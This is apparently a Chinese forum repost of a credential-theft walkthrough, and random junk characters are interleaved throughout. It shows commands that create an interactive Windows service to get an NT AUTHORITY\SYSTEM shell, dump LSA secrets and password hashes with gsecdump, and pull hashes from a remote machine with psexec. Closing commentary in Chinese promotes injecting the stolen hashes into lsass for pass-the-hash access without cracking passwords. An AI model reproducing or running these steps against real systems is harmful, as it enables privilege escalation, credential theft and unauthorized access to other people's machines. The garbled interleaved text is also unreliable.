HASH注入式攻击

admin

o get a DOS Prompt as NT system:
- M- ]% D( P4 A5 M
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
( K2 |7 G( x; `& y[SC] CreateService SUCCESS

0 {; _" e5 q# `C:\>sc start shellcmdline
[SC] StartService FAILED 1053:
! [( L/ X* h* J! A$ D
The service did not respond to the start or control request in a timely fashion.
8 H0 v. y5 m6 y! l1 F6 c
3 Z- \+ H- ^& v5 o) PC:\>sc delete shellcmdline
' M& z6 [) ?3 J5 @  r[SC] DeleteService SUCCESS
! O3 R, `5 r1 M' U
  [0 B- f+ R3 j5 Y9 S------------
3 d1 o. w% G2 S9 ~% B9 [/ R7 T8 E
4 u6 i, L" w/ ^1 eThen in the new DOS window:
; [- r: A' Z' x9 c
- N. j: g; |/ W  RMicrosoft Windows XP [Version 5.1.2600]
& o- r! z. m' J% v, J% D1 t(C) Copyright 1985-2001 Microsoft Corp.
( T' S; ~* p' G
0 D- e# K+ |$ D, G- TC:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
4 l- F& _& f% h! M! H3 Z
C:\WINDOWS\system32>gsecdump -h
. M1 b  [" |  `  r0 v$ H. cgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
# \7 `" `# H0 a4 k) g& ?- Nusage: gsecdump [options]

1 D3 E0 O( w, G. i" Ioptions:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
) y% K% c: a/ U' E+ n4 q" `-w [ --dump_wireless ] dump microsoft wireless connections
  Y% o* [2 K0 \+ r; U+ C0 O9 V-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:
6 X* O" Y! X0 |: E4 T% M, f9 Q
  k! c" P1 V- ^& i  lPsExec v1.83 - Execute processes remotely
% J+ f! O: ?6 P% p# ^5 S, y+ j4 yCopyright (C) 2001-2007 Mark Russinovich
& K; k& q7 _: ]. f. mSysinternals - 链接标记[url]www.sysinternals.com[/url]
% k+ t  u% R0 F- `9 g
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.
, i$ _4 @# r. k: Q
" y- T/ {6 m, L  Z) _& ]These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
. X0 i6 a+ p- w  k" T3 D9 x
! C& @0 Y" ^& o& q/ n提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
9 x2 q5 S5 ]2 y原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
  }2 ?; ~4 |. Y, h, v
我看了下原文出处，貌似是/2007/03/16/郁闷啊，差距。
$ z$ t# r; T% U4 L- C8 Z$ x